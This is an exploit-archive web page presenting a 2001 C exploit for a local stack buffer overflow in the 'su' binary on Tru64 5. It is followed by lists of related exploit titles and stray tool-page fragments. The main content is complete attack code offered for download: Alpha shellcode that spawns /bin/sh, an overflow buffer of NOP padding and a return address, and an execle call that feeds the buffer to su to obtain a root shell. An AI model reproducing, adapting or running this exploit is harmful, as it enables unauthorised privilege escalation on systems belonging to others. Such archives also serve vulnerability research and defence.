Menu

Search for hundreds of thousands of exploits

"Tru64 5 - 'su' Env Local Stack Overflow"

Author

Exploit author

K2

Platform

Exploit platform

tru64

Release date

Exploit published date

2001-01-26

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
/*      Copyright (c) 2000 ADM                                  */
/*      All Rights Reserved                                     */
/*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM      */
/*      The copyright notice above does not evidence any        */
/*      actual or intended publication of such source code.     */
/*                                                              */
/*      Title:        Tru64 5 su                                */
/*      Tested under: Tru64 5A  (OSF/1)                         */
/*      By:           K2  (thx horizon,lamont :)                */
/*      Use:          cc -o tru64-su tru64-su.c                 */
/*      Issues:       Tru64 re-implmented non-exec patch,       */
/*                    I'm working on non-exec alpha technique   */
/*                    so it will only work if,                  */
/*                    do this -> "sysconfig -q proc executable_stack" */
/*                    and see if -> "executable_stack = 1"      */
/*                    else?                                     */
/*                    wait for new alpha non-exec stack exploit */
/*                                                              */


#include <unistd.h>
#include <stdlib.h>
#include <strings.h>
#include <string.h>
#include <stdio.h>

#define BUFSIZE 8241
char *nop                               = "\x1f\x04\xff\x47";
char *retaddr                   = "\xe4\xc0\xff\x1f\x01\x00\x00\x00";

/* lamont's shellcode */

int rawcode[] = {
  0x2230fec4,              /* subq $16,0x13c,$17 [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0x42509532,              /* subq $18, 0x84     [2000]*/
  0x239fffff,              /* xor $18, 0xffffffff, $18 */
  0x4b84169c,
  0x465c0812,
  0xb2510134,              /* stl $18, 0x134($17)[2000]*/
  0x265cff98,              /* lda $18, 0xff978cd0[2000]*/
  0x22528cd1,
  0x465c0812,              /* xor $18, 0xffffffff, $18 */
  0xb2510140,              /* stl $18, 0x140($17)[2000]*/
  0xb6110148,              /* stq $16,0x148($17) [2000]*/
  0xb7f10150,              /* stq $31,0x150($17) [2000]*/
  0x22310148,              /* addq $17,0x148,$17 [2000]*/
  0x225f013a,              /* ldil $18,0x13a     [2000]*/
  0x425ff520,              /* subq $18,0xff,$0   [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0xffffffff,              /* call_pal 0x83      [2000]*/
  0xd21fffed,              /* bsr $16,$l1    ENTRY     */
  0x6e69622f,              /* .ascii "/bin"      [2000]*/
  /* .ascii "/sh\0" is generated */
};

int main(int argc, char **argv)
{
  char buf[BUFSIZE+4];
  char *env[2];
  char *cp,*rc;
  int i;

  if(argc > 1) retaddr[0]+=atoi(argv[1]);

  memset(&buf,'A',BUFSIZE-8);
  cp=(char *) &(buf[BUFSIZE-8]);

  for (i=0;i<8;i++)
    *cp++=retaddr[i];

  rc=(char *)rawcode;
  cp=buf;

  for(i=0;i<8;i++)
    *cp++ = 0x6e;

  for(i=0;i<72;i++)
    *cp++ = rc[i];
  for(i=0;i<320;i++)
    *cp++ = nop[i % 4];
  *cp++=rc[72]-80;
  for(i=1;i<8;i++)
    *cp++ = rc[i+72];

  env[1]=NULL;

  execle("/usr/bin/su","su",buf, NULL,env);
  return(0);
}


// milw0rm.com [2001-01-26]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2007-06-04 "HP Tru64 - Remote Secure Shell User Enumeration" remote tru64 bunker
2007-02-06 "HP Tru64 Alpha OSF1 5.1 - 'ps' Information Leak" local tru64 bunker
2006-03-29 "Tru64 UNIX 5.0 (Rev. 910) - edauth NLSPATH Buffer Overflow" local tru64 "Kevin Finisterre"
2006-03-29 "Tru64 UNIX 5.0 (Rev. 910) - rdist NLSPATH Buffer Overflow" local tru64 "Kevin Finisterre"
2001-03-02 "Tru64 UNIX 4.0g - '/usr/bin/at' Local Privilege Escalation" local tru64 "Cody Tubbs"
2001-01-26 "Tru64 5 - 'su' Env Local Stack Overflow" local tru64 K2
Release Date Title Type Platform Author
2001-01-26 "Tru64 5 - 'su' Env Local Stack Overflow" local tru64 K2
2001-01-26 "SCO OpenServer 5.0.5 - Env Local Stack Overflow" local sco K2
2000-11-20 "HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow" local hp-ux K2
2000-10-04 "OpenBSD 2.x - 'fstat' Format String" local openbsd K2
2000-01-21 "Inter7 vpopmail (vchkpw) 3.4.11 - Local Buffer Overflow" local linux K2
1999-12-07 "Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'print_domain_name' Remote Buffer Overflow" remote solaris K2
1999-11-25 "SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow" local sco K2
1999-10-30 "SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow" local sco K2 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected